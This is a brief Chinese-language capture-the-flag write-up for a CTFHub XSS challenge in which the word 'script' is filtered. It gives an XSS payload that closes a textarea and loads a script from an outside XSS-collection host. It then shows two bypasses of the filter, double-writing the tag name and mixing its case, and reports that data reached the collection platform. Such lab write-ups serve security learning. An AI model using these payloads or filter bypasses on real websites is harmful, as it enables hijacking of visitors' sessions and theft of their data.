前文链接:DOM反射xss
这次直接浏览器输入payload,发现 script
被过滤掉了
</textarea>'"><script src=http://xsscom.com//cZ2vvZ></script>
碰到这种情况不要慌,下面给出两种方法绕过过滤关键字。
双写绕过
</textarea>'"><scrscriptipt src=http://xsscom.com//cZ2vvZ></scrscriptipt>
大小写绕过
</textarea>'"><Script src=http://xsscom.com//cZ2vvZ></scRipt>
上述两种方式提交后成功在xss平台收到数据:
提交flag,成功解出文章来源:https://www.toymoban.com/news/detail-540746.html
文章来源地址https://www.toymoban.com/news/detail-540746.html
到了这里,关于CTFHub XSS 过滤关键词 WriteUp的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!